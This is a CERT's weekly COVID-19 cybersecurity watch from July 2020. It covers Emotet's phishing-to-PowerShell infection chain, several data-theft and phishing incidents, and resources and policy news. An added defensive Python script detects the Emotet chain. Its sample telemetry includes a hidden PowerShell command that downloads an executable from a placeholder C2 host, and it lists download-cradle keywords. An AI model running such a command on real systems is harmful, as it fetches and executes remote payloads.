COVID-19: CYBERSECURITY WATCH #16 – July 31, 2020

In light of the current health crisis, the CERT of (CERT-DS) will implement a monitoring and alert system linked to the impacts and consequences of COVID-19 on cybersecurity. This monitoring, which can be shared freely, is intended to:

  • Identify the biggest threats to computer systems;
  • Share the resources and tools necessary to grasp and prevent ISS risks;
  • Highlight the best digital practices to adopt in the face of this crisis.

In order to better understand the threats, we will also do a “threat focus” on one of the attacks reported each week, with a detailed description of the attack and its modus operandi.

Each week’s main news items are grouped into four categories: Threats, Fraud, Useful Resources and Other News.

  • “Threats” include malware, phishing and ransomware campaigns, as well as cyberattacks on major infrastructures;
  • “Fraud” includes scams and fake news;
  • “Useful Resources” refers to the information and tools needed to deal with this health crisis;
  • “Other News” combines a variety of information such as government measures taken in the area of cybersecurity.


Focus on the Emotet malware

Attack: In its July 2020 report on threats exploiting COVID-19, McAfee identifies Emotet as one of the most widely distributed malware families.
Method: Phishing Campaigns
Target: Cybersecurity professionals
Publication date: 07/22/2020


Emotet is a Trojan-type malware that spreads mainly via spam e-mail campaigns. It appeared in 2014 and was originally used to steal banking information from its victims via Man-in-the-Browser attacks. It is now used as a malware dropper and is often associated with the TrickBot, IcedID or Zeus Panda malware families.

While Emotet has been keeping a low profile for some time, recent events related to COVID-19 have favored its reintroduction via massive phishing campaigns on virus-related topics targeting both companies and individuals.

Modus Operandi

An Emotet campaign consists of several stages. Phishing e-mails containing an Office document or a download link [to an Office document] are sent to victims. The document contains a macro that runs PowerShell to retrieve the Emotet binary (.exe) from one of the command and control (CnC/C2) servers listed in the macro. Macros are generally disabled by default on most computers; to circumvent this setting, the victim is prompted to enable them in order to view the document. The malware then creates a service in order to maintain its access to the infected machine and can then send information back to the C2 server.

Emotet uses multiple evasion techniques making its detection by analysis tools complex:

  • The use of polymorphism: the binary changes its representation at each download, thus escaping the signature-based detection widely used by traditional antivirus products;
  • A sandbox detection mechanism: the malware identifies that it is running in a virtualized environment and does not activate its malicious code;
  • Encryption of HTTP communications between the malware and the C2 server.

Emotet is composed of several modules allowing it to spread via the e-mails that the victim sends, but also, like a worm, across a corporate network through the use of known vulnerabilities (EternalBlue) or by brute-forcing user accounts with a list of frequently used passwords.

As soon as Emotet gains persistence on a machine, attackers sell access to that infected computer to other cybercriminals. This is commonly known as Malware-as-a-Service (MaaS) or Cybercrime-as-a-Service (CaaS). MaaS/CaaS “clients” can then leverage this access to install other malware, which can be used to steal confidential data or to run ransomware on the internal network of the victim company.
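Because polymorphism defeats signature matching, defenders typically look for the behavioural chain described above instead: an Office application spawning a script host, a PowerShell download cradle, and a new service whose binary sits in a user-writable directory. The following Python script is an added example, not part of the newsletter or of any vendor's tooling; the event records are constructed for illustration (field names such as `parent`, `image`, `cmd` and `path` are assumptions loosely modelled on Sysmon-style telemetry).

```python
from collections import defaultdict

# Process images that commonly host a malicious document macro.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Script hosts a macro typically launches to fetch a second stage.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe"}
# Substrings that indicate a PowerShell download cradle (case-insensitive match).
DOWNLOAD_HINTS = ("downloadfile", "downloadstring", "invoke-webrequest", "net.webclient", "bitsadmin")
# Service binaries living here rather than in Program Files / System32 are suspicious.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")

# Constructed sample telemetry (not real logs). type "proc" = process creation,
# type "svc" = service installation. Timestamps are seconds, C2 host is a placeholder.
SAMPLE_EVENTS = [
    {"host": "WS01", "ts": 100, "type": "proc", "parent": "explorer.exe", "image": "winword.exe",
     "cmd": "winword.exe C:\\Users\\alice\\Downloads\\invoice_covid.doc"},
    {"host": "WS01", "ts": 104, "type": "proc", "parent": "winword.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -w hidden (New-Object Net.WebClient).DownloadFile("
            "'http://c2.example.invalid/x', 'C:\\Users\\alice\\AppData\\Local\\Temp\\x.exe')"},
    {"host": "WS01", "ts": 110, "type": "svc", "name": "UpdateSvc",
     "path": "C:\\Users\\alice\\AppData\\Local\\Temp\\x.exe"},
    # Benign activity on a second host: Office opened by the user, an interactive
    # PowerShell session, and a legitimate system service.
    {"host": "WS02", "ts": 200, "type": "proc", "parent": "explorer.exe", "image": "excel.exe",
     "cmd": "excel.exe budget.xlsx"},
    {"host": "WS02", "ts": 230, "type": "proc", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell.exe Get-Process"},
    {"host": "WS02", "ts": 240, "type": "svc", "name": "Spooler",
     "path": "C:\\Windows\\System32\\spoolsv.exe"},
]

STAGE_MACRO = "office_spawns_script_host"
STAGE_CRADLE = "powershell_download_cradle"
STAGE_PERSIST = "service_from_user_writable_path"


def detect_emotet_chain(events, window=600):
    """Correlate per-host events into the three stages of the infection chain.

    Returns {host: {"stages": [...], "full_chain": bool}} for hosts with at least
    one stage; events are only counted if they occur within `window` seconds of
    the first suspicious event seen on that host.
    """
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host[ev["host"]].append(ev)

    findings = {}
    for host, evs in by_host.items():
        stages, first_ts = [], None
        for ev in evs:
            if first_ts is not None and ev["ts"] - first_ts > window:
                break  # outside the correlation window
            hit = None
            if ev["type"] == "proc":
                parent, image, cmd = ev["parent"].lower(), ev["image"].lower(), ev["cmd"].lower()
                if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
                    hit = STAGE_MACRO
                elif image in {"powershell.exe", "pwsh.exe"} and any(h in cmd for h in DOWNLOAD_HINTS):
                    hit = STAGE_CRADLE
            elif ev["type"] == "svc":
                if any(d in ev["path"].lower() for d in USER_WRITABLE):
                    hit = STAGE_PERSIST
            # The cradle event on WS01 matches both the macro rule (winword parent)
            # and the cradle rule; record both so the chain is complete.
            if ev["type"] == "proc" and hit == STAGE_MACRO:
                cmd = ev["cmd"].lower()
                if any(h in cmd for h in DOWNLOAD_HINTS) and STAGE_CRADLE not in stages:
                    stages.append(STAGE_CRADLE)
            if hit and hit not in stages:
                stages.append(hit)
                first_ts = ev["ts"] if first_ts is None else first_ts
        if stages:
            findings[host] = {"stages": sorted(stages), "full_chain": len(stages) == 3}
    return findings


if __name__ == "__main__":
    for host, result in detect_emotet_chain(SAMPLE_EVENTS).items():
        print(host, result)
```

Each stage alone is a weak signal (administrators do run PowerShell), which is why the script scores them per host and flags `full_chain` only when all three appear within the window; in a real SIEM the same logic maps onto process-creation, service-install and proxy logs, and the C2 host in the cradle would be handed to the proxy/DNS team as the pivot for the Encryption-of-HTTP evasion noted above.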



Attack: U.S. Department of Justice indicts two Chinese cybercriminals for theft of confidential information, including research on COVID-19
Method: Data theft
Target: Public and private entities, mostly in the United States
Publication date: 07/21/2020
Description: Li Xiaoyu and Dong Jiazhi are accused of running a decade-long hacking campaign targeting public and private entities in various countries. Recently, they reportedly attempted to penetrate networks of companies and research institutes working on COVID-19 testing and vaccine development. In some cases, they allegedly worked for the Chinese intelligence services and in others for personal gains.


Attack: A cybercriminal posts medical communications about several thousand Australians on the Internet, including some proven COVID-19 cases
Method: Data theft
Target: Communication system of medical establishments in Western Australia
Publication date: 07/20/2020
Description: The cybercriminal exploited the lack of encryption in a pager communication network used by medical facilities in Western Australia. The stolen data contains phone numbers, addresses and medical status of thousands of patients and medical professionals in the state. The website on which it was posted has since been closed down and the compromised communication service has been deactivated.



Attack: Punjab state police warns of COVID-19 related phishing campaign
Method: Phishing
Surface/Application: Instant messaging services (SMS and WhatsApp)
Publication date: 07/25/2020
Description: The fraudulent URL link circulating on instant messaging services claims to provide government financial assistance under COVID-19. If victims click on the link, they are redirected to a survey that, once completed, prompts them to share a link with their contacts. Citizens are reminded not to click on these fraudulent links, which can spread malware or allow cybercriminals to steal financial data.


Useful Resources

Type of resources: The U.S. Internal Revenue Service (IRS) publishes a list of tax frauds exploiting COVID-19
Target: General public
Publication date: 07/16/2020
Description: Called “Dirty Dozen”, this list, published annually, provides an overview of tax frauds. In 2020, particular emphasis is placed on those who exploited the COVID-19 pandemic to obtain personal data of thousands of taxpayers. The most commonly used schemes are phishing campaigns, fake charities, or scams circulating on social networks.


Type of resources: In France, the National Pilot Committee on Digital Ethics (CNPEN) publishes a report on the use of digital tools in telemedicine in the context of the COVID-19 pandemic
Target: Healthcare institutions
Publication date: 07/21/2020
Description: Faced with the upheaval caused by the COVID-19 pandemic in medical practices and within healthcare institutions, this report emphasizes the need for an ethical and legal framework for new digital tools. The protection of personal data and the awareness of healthcare personnel regarding these new digital tools are also central issues of this report.


Type of resources: Tencent has developed a tool based on Artificial Intelligence to anticipate the severe symptoms of COVID-19
Target: Healthcare institutions
Publication date: 07/15/2020
Description: Based on a statistical model called “survival analysis,” the artificial intelligence (AI) used by Tencent’s researchers can process a large amount of medical data about patients’ health problems and family history. This AI can then predict the risk that patients with COVID-19 will develop severe symptoms based on their clinical characteristics.


Type of resources: Facebook launches an anti-disinformation section in its COVID-19 Information Center
Target: General public
Publication date: 07/15/2020
Description: Facebook has invested several million euros in its strategy to combat misinformation. The social network advocates access to quality information and the definitive removal of harmful content, such as misleading advertisements for the sale of medical products (medical masks, hand sanitizers, COVID-19 test kits, etc.).


Other News

Country: International
Subject: Google will block ads on websites and applications spreading “dangerous content” about the COVID-19 Pandemic
Publication date: 07/17/2020
Description: The measure, which will begin on August 18, concerns false allegations that go against the authoritative scientific consensus and that may contribute to conspiracy theories about COVID-19, such as anti-vaccine promotions or content that encourages users to reject treatment. In addition, if publishers fail to comply with the anti-disinformation policy, Google will be able to demonetize their website.


Country: International
Subject: Siemens deploys an application to facilitate employees' return to the office under COVID-19
Publication date: 07/23/2020
Description: Called Comfy, this application will provide employees with real-time information on the occupancy rate of their workplaces, helping to regulate the number of employees present in the working area. More than 600 facilities should be equipped, encompassing 100,000 employees in 30 countries.
